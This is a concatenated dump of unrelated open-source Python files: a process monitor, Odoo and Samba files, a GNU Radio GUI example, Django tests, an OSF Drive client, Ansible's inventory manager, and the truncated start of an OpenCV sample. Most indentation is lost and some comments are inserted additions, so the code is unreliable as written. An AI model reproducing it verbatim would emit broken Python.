data = sp.check_output(["ps", "-C", options.command, "-o" "%cpu=,%mem="])
if options.multithread:
temp = tuple(float(x) for x in data.split())
data = (sum(temp[::2]), sum(temp[1::2]))
else:
data = tuple(float(x) for x in data.split()[0:2])
except sp.CalledProcessError:
if (options.skip):
            data = None
        else:
            data = (0., 0.)
return data
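# Note added for clarity (not in the original script): with the "%cpu=,%mem=" format, ps
# prints one "cpu mem" pair per matching process (e.g. "12.5  1.3"); the default branch
# keeps the first pair, while --multithread sums the cpu and mem columns over all lines.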
class HostData(object):
def __init__(self):
self.last_total = None
self.last_time = None
self.clk_tck = os.sysconf(os.sysconf_names['SC_CLK_TCK'])
self.start = self.get_total_usage()
self.start_time = time.time()
def get_total_usage(self):
return sum(float(x) for x in
open("/proc/stat").readline().split()[:3])
def calc_cpu(self, a, b, start_time):
duration = time.time() - start_time
return (a - b) / duration / self.clk_tck
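    # Note added for clarity (not in the original): calc_cpu turns the growth of the
    # cumulative jiffy counters from /proc/stat into a utilisation figure. For example,
    # with SC_CLK_TCK = 100, a delta of 150 jiffies over 1.0 s gives 150 / 1.0 / 100 = 1.5,
    # i.e. roughly one and a half CPUs busy during that interval.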
def get_cpu(self):
usage = None
total = self.get_total_usage()
if self.last_total is not None:
usage = self.calc_cpu(total, self.last_total, self.last_time)
self.last_time = time.time()
self.last_total = total
return usage
def get_mem(self):
line = sp.check_output(["free"]).split("\n")[1]
total, used = (int(x) for x in line.split()[1:3])
return float(used) / float(total) * 100.
def __call__(self, *args):
cpu = self.get_cpu()
if cpu is None:
return
return cpu, self.get_mem()
def average(self):
total = self.get_total_usage()
return self.calc_cpu(total, self.start, self.start_time)
if __name__=="__main__":
import argparse
parser = argparse.ArgumentParser()
parser.add_argument("-C", "--command", action="store",
help="The command to look for in the ps log.", default=None)
parser.add_argument("-t", "--time", action="store", type=int,
help="Time to run for in seconds (-1 to run forever)", default=-1)
parser.add_argument("-w", "--wait", action="store", type=int,
help="Wait time in ms between calls to ps.", default=100)
parser.add_argument("-s", "--skip", action="store_true",
help="Only output data when command is running.")
parser.add_argument("-m", "--multithread", action="store_true",
help="Treat the process as a multi-threaded one when calling ps.")
options = parser.parse_args()
if not options.command:
get_data = HostData()
else:
get_data = get_ps_data
try:
start_time = time.time()
end_time = start_time + options.time
print("#%7s %3s %3s" % ("TIME", "CPU", "MEM"))
while options.time < 0 or time.time() < end_time:
t = time.time()-start_time
data = get_data(options)
if data:
print("%8.1f %-3.1f %3.1f" % ((t,) + data))
sys.stdout.flush()
time.sleep(options.wait / 1000.)
except KeyboardInterrupt:
print()
if hasattr(get_data, "average"):
print("%-8s %-3.1f" % (("Average", get_data.average())))
| apache-2.0 |
ovnicraft/odoo | addons/l10n_no/__init__.py | 693 | 1057 | # -*- encoding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2009 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
jhrozek/samba-ldb-mdb | python/samba/tests/dcerpc/registry.py | 51 | 1887 | # Unix SMB/CIFS implementation.
# Copyright (C) Jelmer Vernooij <[email protected]> 2008
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
"""Tests for samba.dcerpc.registry."""
from samba.dcerpc import winreg
from samba.tests import RpcInterfaceTestCase
class WinregTests(RpcInterfaceTestCase):
def setUp(self):
super(WinregTests, self).setUp()
self.conn = winreg.winreg("ncalrpc:", self.get_loadparm(),
self.get_credentials())
def get_hklm(self):
return self.conn.OpenHKLM(None,
winreg.KEY_QUERY_VALUE | winreg.KEY_ENUMERATE_SUB_KEYS)
def test_hklm(self):
handle = self.conn.OpenHKLM(None,
winreg.KEY_QUERY_VALUE | winreg.KEY_ENUMERATE_SUB_KEYS)
self.conn.CloseKey(handle)
def test_getversion(self):
handle = self.get_hklm()
version = self.conn.GetVersion(handle)
self.assertEquals(int, version.__class__)
self.conn.CloseKey(handle)
def test_getkeyinfo(self):
handle = self.conn.OpenHKLM(None,
winreg.KEY_QUERY_VALUE | winreg.KEY_ENUMERATE_SUB_KEYS)
x = self.conn.QueryInfoKey(handle, winreg.String())
self.assertEquals(9, len(x)) # should return a 9-tuple
self.conn.CloseKey(handle)
| gpl-3.0 |
TheWylieStCoyote/gnuradio | gr-qtgui/examples/pyqt_example_f.py | 3 | 5397 | #!/usr/bin/env python
#
# Copyright 2011,2012,2015 Free Software Foundation, Inc.
#
# This file is part of GNU Radio
#
# SPDX-License-Identifier: GPL-3.0-or-later
#
#
from __future__ import print_function
from __future__ import unicode_literals
from gnuradio import gr, filter
from gnuradio import blocks
import sys
try:
from gnuradio import qtgui
from PyQt5 import QtWidgets, Qt
import sip
except ImportError:
sys.stderr.write("Error: Program requires PyQt5 and gr-qtgui.\n")
sys.exit(1)
try:
from gnuradio import analog
except ImportError:
sys.stderr.write("Error: Program requires gr-analog.\n")
sys.exit(1)
class dialog_box(QtWidgets.QWidget):
def __init__(self, display, control):
QtWidgets.QWidget.__init__(self, None)
self.setWindowTitle('PyQt Test GUI')
self.boxlayout = QtWidgets.QBoxLayout(QtWidgets.QBoxLayout.LeftToRight, self)
self.boxlayout.addWidget(display, 1)
self.boxlayout.addWidget(control)
self.resize(800, 500)
class control_box(QtWidgets.QWidget):
def __init__(self, parent=None):
QtWidgets.QWidget.__init__(self, parent)
self.setWindowTitle('Control Panel')
self.setToolTip('Control the signals')
QtWidgets.QToolTip.setFont(Qt.QFont('OldEnglish', 10))
self.layout = QtWidgets.QFormLayout(self)
# Control the first signal
self.freq1Edit = QtWidgets.QLineEdit(self)
self.freq1Edit.setMinimumWidth(100)
self.layout.addRow("Signal 1 Frequency:", self.freq1Edit)
self.freq1Edit.editingFinished.connect(self.freq1EditText)
self.amp1Edit = QtWidgets.QLineEdit(self)
self.amp1Edit.setMinimumWidth(100)
self.layout.addRow("Signal 1 Amplitude:", self.amp1Edit)
self.amp1Edit.editingFinished.connect(self.amp1EditText)
# Control the second signal
self.freq2Edit = QtWidgets.QLineEdit(self)
self.freq2Edit.setMinimumWidth(100)
self.layout.addRow("Signal 2 Frequency:", self.freq2Edit)
self.freq2Edit.editingFinished.connect(self.freq2EditText)
self.amp2Edit = QtWidgets.QLineEdit(self)
self.amp2Edit.setMinimumWidth(100)
self.layout.addRow("Signal 2 Amplitude:", self.amp2Edit)
self.amp2Edit.editingFinished.connect(self.amp2EditText)
self.quit = QtWidgets.QPushButton('Close', self)
self.quit.setMinimumWidth(100)
self.layout.addWidget(self.quit)
self.quit.clicked.connect(QtWidgets.qApp.quit)
def attach_signal1(self, signal):
self.signal1 = signal
self.freq1Edit.setText(("{0}").format(self.signal1.frequency()))
self.amp1Edit.setText(("{0}").format(self.signal1.amplitude()))
def attach_signal2(self, signal):
self.signal2 = signal
self.freq2Edit.setText(("{0}").format(self.signal2.frequency()))
self.amp2Edit.setText(("{0}").format(self.signal2.amplitude()))
def freq1EditText(self):
try:
newfreq = float(self.freq1Edit.text())
self.signal1.set_frequency(newfreq)
except ValueError:
print("Bad frequency value entered")
def amp1EditText(self):
try:
newamp = float(self.amp1Edit.text())
self.signal1.set_amplitude(newamp)
except ValueError:
print("Bad amplitude value entered")
def freq2EditText(self):
try:
newfreq = float(self.freq2Edit.text())
self.signal2.set_frequency(newfreq)
except ValueError:
print("Bad frequency value entered")
def amp2EditText(self):
try:
newamp = float(self.amp2Edit.text())
self.signal2.set_amplitude(newamp)
except ValueError:
print("Bad amplitude value entered")
class my_top_block(gr.top_block):
def __init__(self):
gr.top_block.__init__(self)
Rs = 8000
f1 = 1000
f2 = 2000
fftsize = 2048
self.qapp = QtWidgets.QApplication(sys.argv)
src1 = analog.sig_source_f(Rs, analog.GR_SIN_WAVE, f1, 0.1, 0)
src2 = analog.sig_source_f(Rs, analog.GR_SIN_WAVE, f2, 0.1, 0)
src = blocks.add_ff()
thr = blocks.throttle(gr.sizeof_float, 100*fftsize)
noise = analog.noise_source_f(analog.GR_GAUSSIAN, 0.001)
add = blocks.add_ff()
self.snk1 = qtgui.sink_f(fftsize, filter.firdes.WIN_BLACKMAN_hARRIS,
0, Rs,
"Float Signal Example",
True, True, True, False)
self.connect(src1, (src,0))
self.connect(src2, (src,1))
self.connect(src, thr, (add,0))
self.connect(noise, (add,1))
self.connect(add, self.snk1)
self.ctrl_win = control_box()
self.ctrl_win.attach_signal1(src1)
self.ctrl_win.attach_signal2(src2)
# Get the reference pointer to the SpectrumDisplayForm QWidget
pyQt = self.snk1.pyqwidget()
# Wrap the pointer as a PyQt SIP object
# This can now be manipulated as a PyQt5.QtWidgets.QWidget
pyWin = sip.wrapinstance(pyQt, QtWidgets.QWidget)
self.main_box = dialog_box(pyWin, self.ctrl_win)
self.main_box.show()
if __name__ == "__main__":
tb = my_top_block();
tb.start()
tb.qapp.exec_()
tb.stop()
| gpl-3.0 |
carljm/django | tests/backends/test_creation.py | 26 | 3755 | import copy
import unittest
from contextlib import contextmanager
from django.db import DEFAULT_DB_ALIAS, connection, connections
from django.db.backends.base.creation import (
TEST_DATABASE_PREFIX, BaseDatabaseCreation,
)
from django.db.backends.postgresql.creation import DatabaseCreation
from django.test import SimpleTestCase
class TestDbSignatureTests(SimpleTestCase):
def get_connection_copy(self):
# Get a copy of the default connection. (Can't use django.db.connection
# because it'll modify the default connection itself.)
test_connection = copy.copy(connections[DEFAULT_DB_ALIAS])
test_connection.settings_dict = copy.copy(connections[DEFAULT_DB_ALIAS].settings_dict)
return test_connection
def test_default_name(self):
# A test db name isn't set.
prod_name = 'hodor'
test_connection = self.get_connection_copy()
test_connection.settings_dict['NAME'] = prod_name
test_connection.settings_dict['TEST'] = {'NAME': None}
signature = BaseDatabaseCreation(test_connection).test_db_signature()
self.assertEqual(signature[3], TEST_DATABASE_PREFIX + prod_name)
def test_custom_test_name(self):
# A regular test db name is set.
test_name = 'hodor'
test_connection = self.get_connection_copy()
test_connection.settings_dict['TEST'] = {'NAME': test_name}
signature = BaseDatabaseCreation(test_connection).test_db_signature()
self.assertEqual(signature[3], test_name)
def test_custom_test_name_with_test_prefix(self):
# A test db name prefixed with TEST_DATABASE_PREFIX is set.
test_name = TEST_DATABASE_PREFIX + 'hodor'
test_connection = self.get_connection_copy()
test_connection.settings_dict['TEST'] = {'NAME': test_name}
signature = BaseDatabaseCreation(test_connection).test_db_signature()
self.assertEqual(signature[3], test_name)
@unittest.skipUnless(connection.vendor == 'postgresql', "PostgreSQL-specific tests")
class PostgreSQLDatabaseCreationTests(SimpleTestCase):
@contextmanager
def changed_test_settings(self, **kwargs):
settings = connection.settings_dict['TEST']
saved_values = {}
for name in kwargs:
if name in settings:
saved_values[name] = settings[name]
for name, value in kwargs.items():
settings[name] = value
try:
yield
finally:
for name, value in kwargs.items():
if name in saved_values:
settings[name] = saved_values[name]
else:
del settings[name]
def check_sql_table_creation_suffix(self, settings, expected):
with self.changed_test_settings(**settings):
creation = DatabaseCreation(connection)
suffix = creation.sql_table_creation_suffix()
self.assertEqual(suffix, expected)
def test_sql_table_creation_suffix_with_none_settings(self):
settings = dict(CHARSET=None, TEMPLATE=None)
self.check_sql_table_creation_suffix(settings, "")
def test_sql_table_creation_suffix_with_encoding(self):
settings = dict(CHARSET='UTF8')
self.check_sql_table_creation_suffix(settings, "WITH ENCODING 'UTF8'")
def test_sql_table_creation_suffix_with_template(self):
settings = dict(TEMPLATE='template0')
self.check_sql_table_creation_suffix(settings, 'WITH TEMPLATE "template0"')
def test_sql_table_creation_suffix_with_encoding_and_template(self):
settings = dict(CHARSET='UTF8', TEMPLATE='template0')
self.check_sql_table_creation_suffix(settings, '''WITH ENCODING 'UTF8' TEMPLATE "template0"''')
| bsd-3-clause |
RomanZWang/osf.io | website/addons/googledrive/client.py | 26 | 1530 | # -*- coding: utf-8 -*-
from framework.exceptions import HTTPError
from website.util.client import BaseClient
from website.addons.googledrive import settings
class GoogleAuthClient(BaseClient):
def userinfo(self, access_token):
return self._make_request(
'GET',
self._build_url(settings.API_BASE_URL, 'oauth2', 'v3', 'userinfo'),
params={'access_token': access_token},
expects=(200, ),
throws=HTTPError(401)
).json()
class GoogleDriveClient(BaseClient):
def __init__(self, access_token=None):
self.access_token = access_token
@property
def _default_headers(self):
if self.access_token:
return {'authorization': 'Bearer {}'.format(self.access_token)}
return {}
def about(self):
return self._make_request(
'GET',
self._build_url(settings.API_BASE_URL, 'drive', 'v2', 'about', ),
expects=(200, ),
throws=HTTPError(401)
).json()
def folders(self, folder_id='root'):
query = ' and '.join([
"'{0}' in parents".format(folder_id),
'trashed = false',
"mimeType = 'application/vnd.google-apps.folder'",
])
res = self._make_request(
'GET',
self._build_url(settings.API_BASE_URL, 'drive', 'v2', 'files', ),
params={'q': query},
expects=(200, ),
throws=HTTPError(401)
)
return res.json()['items']
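# Note added for clarity (not part of the original client): for folder_id='root' the query
# assembled in folders() reads "'root' in parents and trashed = false and
# mimeType = 'application/vnd.google-apps.folder'", i.e. it asks the Drive v2 files endpoint
# for the untrashed sub-folders of the given parent.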
| apache-2.0 |
jmighion/ansible | lib/ansible/inventory/manager.py | 4 | 22984 | # (c) 2012-2014, Michael DeHaan <[email protected]>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#############################################
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import fnmatch
import os
import re
import itertools
from ansible import constants as C
from ansible.errors import AnsibleError, AnsibleOptionsError, AnsibleParserError
from ansible.inventory.data import InventoryData
from ansible.module_utils.six import string_types
from ansible.module_utils._text import to_bytes, to_native
from ansible.parsing.utils.addresses import parse_address
from ansible.plugins.loader import PluginLoader
from ansible.utils.path import unfrackpath
try:
from __main__ import display
except ImportError:
from ansible.utils.display import Display
display = Display()
IGNORED_ALWAYS = [b"^\.", b"^host_vars$", b"^group_vars$", b"^vars_plugins$"]
IGNORED_PATTERNS = [to_bytes(x) for x in C.INVENTORY_IGNORE_PATTERNS]
IGNORED_EXTS = [b'%s$' % to_bytes(re.escape(x)) for x in C.INVENTORY_IGNORE_EXTS]
IGNORED = re.compile(b'|'.join(IGNORED_ALWAYS + IGNORED_PATTERNS + IGNORED_EXTS))
def order_patterns(patterns):
''' takes a list of patterns and reorders them by modifier to apply them consistently '''
# FIXME: this goes away if we apply patterns incrementally or by groups
pattern_regular = []
pattern_intersection = []
pattern_exclude = []
for p in patterns:
if p.startswith("!"):
pattern_exclude.append(p)
elif p.startswith("&"):
pattern_intersection.append(p)
elif p:
pattern_regular.append(p)
# if no regular pattern was given, hence only exclude and/or intersection
# make that magically work
if pattern_regular == []:
pattern_regular = ['all']
# when applying the host selectors, run those without the "&" or "!"
# first, then the &s, then the !s.
return pattern_regular + pattern_intersection + pattern_exclude
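# Illustrative example (not in the original module): order_patterns(['!db*', 'web*', '&staging'])
# returns ['web*', '&staging', '!db*'], so plain patterns are applied first, then
# intersections, then exclusions.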
def split_host_pattern(pattern):
"""
Takes a string containing host patterns separated by commas (or a list
thereof) and returns a list of single patterns (which may not contain
commas). Whitespace is ignored.
Also accepts ':' as a separator for backwards compatibility, but it is
not recommended due to the conflict with IPv6 addresses and host ranges.
Example: 'a,b[1], c[2:3] , d' -> ['a', 'b[1]', 'c[2:3]', 'd']
"""
if isinstance(pattern, list):
return list(itertools.chain(*map(split_host_pattern, pattern)))
# If it's got commas in it, we'll treat it as a straightforward
# comma-separated list of patterns.
elif ',' in pattern:
patterns = re.split('\s*,\s*', pattern)
# If it doesn't, it could still be a single pattern. This accounts for
# non-separator uses of colons: IPv6 addresses and [x:y] host ranges.
else:
try:
(base, port) = parse_address(pattern, allow_ranges=True)
patterns = [pattern]
except:
# The only other case we accept is a ':'-separated list of patterns.
# This mishandles IPv6 addresses, and is retained only for backwards
# compatibility.
patterns = re.findall(
r'''(?: # We want to match something comprising:
[^\s:\[\]] # (anything other than whitespace or ':[]'
| # ...or...
\[[^\]]*\] # a single complete bracketed expression)
)+ # occurring once or more
''', pattern, re.X
)
return [p.strip() for p in patterns]
class InventoryManager(object):
''' Creates and manages inventory '''
def __init__(self, loader, sources=None):
# base objects
self._loader = loader
self._inventory = InventoryData()
# a list of host(names) to contain current inquiries to
self._restriction = None
self._subset = None
# caches
self._hosts_patterns_cache = {} # resolved full patterns
self._pattern_cache = {} # resolved individual patterns
self._inventory_plugins = [] # for generating inventory
# the inventory dirs, files, script paths or lists of hosts
if sources is None:
self._sources = []
elif isinstance(sources, string_types):
self._sources = [sources]
else:
self._sources = sources
# get to work!
self.parse_sources()
@property
def localhost(self):
return self._inventory.localhost
@property
def groups(self):
return self._inventory.groups
@property
def hosts(self):
return self._inventory.hosts
def get_vars(self, *args, **kwargs):
return self._inventory.get_vars(args, kwargs)
def add_host(self, host, group=None, port=None):
return self._inventory.add_host(host, group, port)
def add_group(self, group):
return self._inventory.add_group(group)
def get_groups_dict(self):
return self._inventory.get_groups_dict()
def reconcile_inventory(self):
self.clear_caches()
return self._inventory.reconcile_inventory()
def get_host(self, hostname):
return self._inventory.get_host(hostname)
def _setup_inventory_plugins(self):
''' sets up loaded inventory plugins for usage '''
inventory_loader = PluginLoader('InventoryModule', 'ansible.plugins.inventory', C.DEFAULT_INVENTORY_PLUGIN_PATH, 'inventory_plugins')
display.vvvv('setting up inventory plugins')
for name in C.INVENTORY_ENABLED:
plugin = inventory_loader.get(name)
if plugin:
self._inventory_plugins.append(plugin)
else:
display.warning('Failed to load inventory plugin, skipping %s' % name)
if not self._inventory_plugins:
raise AnsibleError("No inventory plugins available to generate inventory, make sure you have at least one whitelisted.")
def parse_sources(self, cache=False):
''' iterate over inventory sources and parse each one to populate it'''
self._setup_inventory_plugins()
parsed = False
# allow for multiple inventory parsing
for source in self._sources:
if source:
if ',' not in source:
source = unfrackpath(source, follow=False)
parse = self.parse_source(source, cache=cache)
if parse and not parsed:
parsed = True
if parsed:
# do post processing
self._inventory.reconcile_inventory()
else:
display.warning("No inventory was parsed, only implicit localhost is available")
self._inventory_plugins = []
def parse_source(self, source, cache=False):
''' Generate or update inventory for the source provided '''
parsed = False
display.debug(u'Examining possible inventory source: %s' % source)
b_source = to_bytes(source)
# process directories as a collection of inventories
if os.path.isdir(b_source):
display.debug(u'Searching for inventory files in directory: %s' % source)
for i in sorted(os.listdir(b_source)):
display.debug(u'Considering %s' % i)
# Skip hidden files and stuff we explicitly ignore
if IGNORED.search(i):
continue
# recursively deal with directory entries
fullpath = os.path.join(b_source, i)
parsed_this_one = self.parse_source(to_native(fullpath))
display.debug(u'parsed %s as %s' % (fullpath, parsed_this_one))
if not parsed:
parsed = parsed_this_one
else:
# left with strings or files, let plugins figure it out
# set so new hosts can use for inventory_file/dir vasr
self._inventory.current_source = source
# get inventory plugins if needed, there should always be at least one generator
if not self._inventory_plugins:
self._setup_inventory_plugins()
# try source with each plugin
failures = []
for plugin in self._inventory_plugins:
plugin_name = to_native(getattr(plugin, '_load_name', getattr(plugin, '_original_path', '')))
display.debug(u'Attempting to use plugin %s (%s)' % (plugin_name, plugin._original_path))
# initialize
if plugin.verify_file(source):
try:
plugin.parse(self._inventory, self._loader, source, cache=cache)
parsed = True
display.vvv('Parsed %s inventory source with %s plugin' % (to_native(source), plugin_name))
break
except AnsibleParserError as e:
display.debug('%s did not meet %s requirements' % (to_native(source), plugin_name))
failures.append({'src': source, 'plugin': plugin_name, 'exc': e})
else:
display.debug('%s did not meet %s requirements' % (to_native(source), plugin_name))
else:
if not parsed and failures:
# only if no plugin processed files should we show errors.
if C.INVENTORY_UNPARSED_IS_FAILED:
msg = "Could not parse inventory source %s with available plugins:\n" % source
for fail in failures:
msg += 'Plugin %s failed: %s\n' % (fail['plugin'], to_native(fail['exc']))
if display.verbosity >= 3:
msg += "%s\n" % fail['exc'].tb
raise AnsibleParserError(msg)
else:
for fail in failures:
display.warning('\n* Failed to parse %s with %s plugin: %s' % (to_native(fail['src']), fail['plugin'], to_native(fail['exc'])))
display.vvv(fail['exc'].tb)
if not parsed:
display.warning("Unable to parse %s as an inventory source" % to_native(source))
# clear up, jic
self._inventory.current_source = None
return parsed
def clear_caches(self):
''' clear all caches '''
self._hosts_patterns_cache = {}
self._pattern_cache = {}
# FIXME: flush inventory cache
def refresh_inventory(self):
''' recalculate inventory '''
self.clear_caches()
self._inventory = InventoryData()
self.parse_sources(cache=False)
def _match_list(self, items, pattern_str):
# compile patterns
try:
if not pattern_str.startswith('~'):
pattern = re.compile(fnmatch.translate(pattern_str))
else:
pattern = re.compile(pattern_str[1:])
except Exception:
raise AnsibleError('Invalid host list pattern: %s' % pattern_str)
# apply patterns
results = []
for item in items:
if pattern.match(item):
results.append(item)
return results
def get_hosts(self, pattern="all", ignore_limits=False, ignore_restrictions=False, order=None):
"""
Takes a pattern or list of patterns and returns a list of matching
inventory host names, taking into account any active restrictions
or applied subsets
"""
# Check if pattern already computed
if isinstance(pattern, list):
pattern_hash = u":".join(pattern)
else:
pattern_hash = pattern
if not ignore_limits and self._subset:
pattern_hash += ":%s" % to_native(self._subset)
if not ignore_restrictions and self._restriction:
pattern_hash += ":%s" % to_native(self._restriction)
if pattern_hash not in self._hosts_patterns_cache:
patterns = split_host_pattern(pattern)
hosts = self._evaluate_patterns(patterns)
# mainly useful for hostvars[host] access
if not ignore_limits and self._subset:
# exclude hosts not in a subset, if defined
subset = self._evaluate_patterns(self._subset)
hosts = [h for h in hosts if h in subset]
if not ignore_restrictions and self._restriction:
# exclude hosts mentioned in any restriction (ex: failed hosts)
hosts = [h for h in hosts if h.name in self._restriction]
seen = set()
self._hosts_patterns_cache[pattern_hash] = [x for x in hosts if x not in seen and not seen.add(x)]
# sort hosts list if needed (should only happen when called from strategy)
if order in ['sorted', 'reverse_sorted']:
from operator import attrgetter
hosts = sorted(self._hosts_patterns_cache[pattern_hash][:], key=attrgetter('name'), reverse=(order == 'reverse_sorted'))
elif order == 'reverse_inventory':
hosts = sorted(self._hosts_patterns_cache[pattern_hash][:], reverse=True)
else:
hosts = self._hosts_patterns_cache[pattern_hash][:]
if order == 'shuffle':
from random import shuffle
shuffle(hosts)
elif order not in [None, 'inventory']:
                raise AnsibleOptionsError("Invalid 'order' specified for inventory hosts: %s" % order)
return hosts
def _evaluate_patterns(self, patterns):
"""
Takes a list of patterns and returns a list of matching host names,
taking into account any negative and intersection patterns.
"""
patterns = order_patterns(patterns)
hosts = []
for p in patterns:
# avoid resolving a pattern that is a plain host
if p in self._inventory.hosts:
hosts.append(self._inventory.get_host(p))
else:
that = self._match_one_pattern(p)
if p.startswith("!"):
hosts = [h for h in hosts if h not in frozenset(that)]
elif p.startswith("&"):
hosts = [h for h in hosts if h in frozenset(that)]
else:
hosts.extend([h for h in that if h.name not in frozenset([y.name for y in hosts])])
return hosts
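    # Illustrative example (group names assumed): _evaluate_patterns(['web*', '&staging', '!web3'])
    # starts from every host matching 'web*', keeps only those also matched by 'staging',
    # and finally drops 'web3' if it is still in the list.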
def _match_one_pattern(self, pattern):
"""
Takes a single pattern and returns a list of matching host names.
Ignores intersection (&) and exclusion (!) specifiers.
The pattern may be:
1. A regex starting with ~, e.g. '~[abc]*'
2. A shell glob pattern with ?/*/[chars]/[!chars], e.g. 'foo*'
3. An ordinary word that matches itself only, e.g. 'foo'
The pattern is matched using the following rules:
1. If it's 'all', it matches all hosts in all groups.
2. Otherwise, for each known group name:
(a) if it matches the group name, the results include all hosts
in the group or any of its children.
(b) otherwise, if it matches any hosts in the group, the results
include the matching hosts.
This means that 'foo*' may match one or more groups (thus including all
hosts therein) but also hosts in other groups.
The built-in groups 'all' and 'ungrouped' are special. No pattern can
match these group names (though 'all' behaves as though it matches, as
described above). The word 'ungrouped' can match a host of that name,
and patterns like 'ungr*' and 'al*' can match either hosts or groups
other than all and ungrouped.
If the pattern matches one or more group names according to these rules,
it may have an optional range suffix to select a subset of the results.
This is allowed only if the pattern is not a regex, i.e. '~foo[1]' does
not work (the [1] is interpreted as part of the regex), but 'foo*[1]'
would work if 'foo*' matched the name of one or more groups.
Duplicate matches are always eliminated from the results.
"""
if pattern.startswith("&") or pattern.startswith("!"):
pattern = pattern[1:]
if pattern not in self._pattern_cache:
(expr, slice) = self._split_subscript(pattern)
hosts = self._enumerate_matches(expr)
try:
hosts = self._apply_subscript(hosts, slice)
except IndexError:
raise AnsibleError("No hosts matched the subscripted pattern '%s'" % pattern)
self._pattern_cache[pattern] = hosts
return self._pattern_cache[pattern]
def _split_subscript(self, pattern):
"""
Takes a pattern, checks if it has a subscript, and returns the pattern
without the subscript and a (start,end) tuple representing the given
subscript (or None if there is no subscript).
Validates that the subscript is in the right syntax, but doesn't make
sure the actual indices make sense in context.
"""
# Do not parse regexes for enumeration info
if pattern.startswith('~'):
return (pattern, None)
# We want a pattern followed by an integer or range subscript.
# (We can't be more restrictive about the expression because the
# fnmatch semantics permit [\[:\]] to occur.)
pattern_with_subscript = re.compile(
r'''^
(.+) # A pattern expression ending with...
\[(?: # A [subscript] expression comprising:
(-?[0-9]+)| # A single positive or negative number
([0-9]+)([:-]) # Or an x:y or x: range.
([0-9]*)
)\]
$
''', re.X
)
subscript = None
m = pattern_with_subscript.match(pattern)
if m:
(pattern, idx, start, sep, end) = m.groups()
if idx:
subscript = (int(idx), None)
else:
if not end:
end = -1
subscript = (int(start), int(end))
if sep == '-':
display.warning("Use [x:y] inclusive subscripts instead of [x-y] which has been removed")
return (pattern, subscript)
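    # Illustrative example (not in the original source): _split_subscript('webservers[1:3]')
    # returns ('webservers', (1, 3)), while _split_subscript('~web.*') comes back untouched
    # with a None subscript because regex patterns are never parsed for ranges.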
def _apply_subscript(self, hosts, subscript):
"""
Takes a list of hosts and a (start,end) tuple and returns the subset of
hosts based on the subscript (which may be None to return all hosts).
"""
if not hosts or not subscript:
return hosts
(start, end) = subscript
if end:
if end == -1:
end = len(hosts) - 1
return hosts[start:end + 1]
else:
return [hosts[start]]
def _enumerate_matches(self, pattern):
"""
Returns a list of host names matching the given pattern according to the
rules explained above in _match_one_pattern.
"""
results = []
# check if pattern matches group
matching_groups = self._match_list(self._inventory.groups, pattern)
if matching_groups:
for groupname in matching_groups:
results.extend(self._inventory.groups[groupname].get_hosts())
else:
# pattern might match host
matching_hosts = self._match_list(self._inventory.hosts, pattern)
if matching_hosts:
for hostname in matching_hosts:
results.append(self._inventory.hosts[hostname])
if not results and pattern in C.LOCALHOST:
# get_host autocreates implicit when needed
implicit = self._inventory.get_host(pattern)
if implicit:
results.append(implicit)
if not results:
display.warning("Could not match supplied host pattern, ignoring: %s" % pattern)
return results
def list_hosts(self, pattern="all"):
""" return a list of hostnames for a pattern """
# FIXME: cache?
result = [h for h in self.get_hosts(pattern)]
# allow implicit localhost if pattern matches and no other results
if len(result) == 0 and pattern in C.LOCALHOST:
result = [pattern]
return result
def list_groups(self):
# FIXME: cache?
return sorted(self._inventory.groups.keys(), key=lambda x: x)
def restrict_to_hosts(self, restriction):
"""
Restrict list operations to the hosts given in restriction. This is used
to batch serial operations in main playbook code, don't use this for other
reasons.
"""
if restriction is None:
return
elif not isinstance(restriction, list):
restriction = [restriction]
self._restriction = [h.name for h in restriction]
def subset(self, subset_pattern):
"""
Limits inventory results to a subset of inventory that matches a given
        pattern, such as to select a given geographic or numeric slice amongst
        a previous 'hosts' selection that only selects roles, or vice versa.
Corresponds to --limit parameter to ansible-playbook
"""
if subset_pattern is None:
self._subset = None
else:
subset_patterns = split_host_pattern(subset_pattern)
results = []
# allow Unix style @filename data
for x in subset_patterns:
if x.startswith("@"):
fd = open(x[1:])
results.extend(fd.read().split("\n"))
fd.close()
else:
results.append(x)
self._subset = results
def remove_restriction(self):
""" Do not restrict list operations """
self._restriction = None
def clear_pattern_cache(self):
self._pattern_cache = {}
| gpl-3.0 |
i4Ds/IRE | IREMedia/libraries/OpenCV/samples/python2/gaussian_mix.py | 7 | 1822 | #!/usr/bin/env python
import numpy as np
from numpy import random
import cv2
def make_gaussians(cluster_n, img_size):
points = []
ref_distrs = []
for i in xrange(cluster_n):
mean = (0.1 + 0.8*random.rand(2)) * img_size
a = (random.rand(2, 2)-0.5)*img_size*0.1
cov = np.dot(a.T, a) + img_size*0.05*np.eye(2)
n = 100 + random.randint(900)
pts = random.multivariate_normal(mean, cov, n)
points.append( pts )
ref_distrs.append( (mean, cov) )
points = np.float32( np.vstack(points) )
return points, ref_distrs
def draw_gaussain(img, mean, cov, color):
x, y = np.int32(mean)
w, u, vt = cv2.SVDecomp(cov)
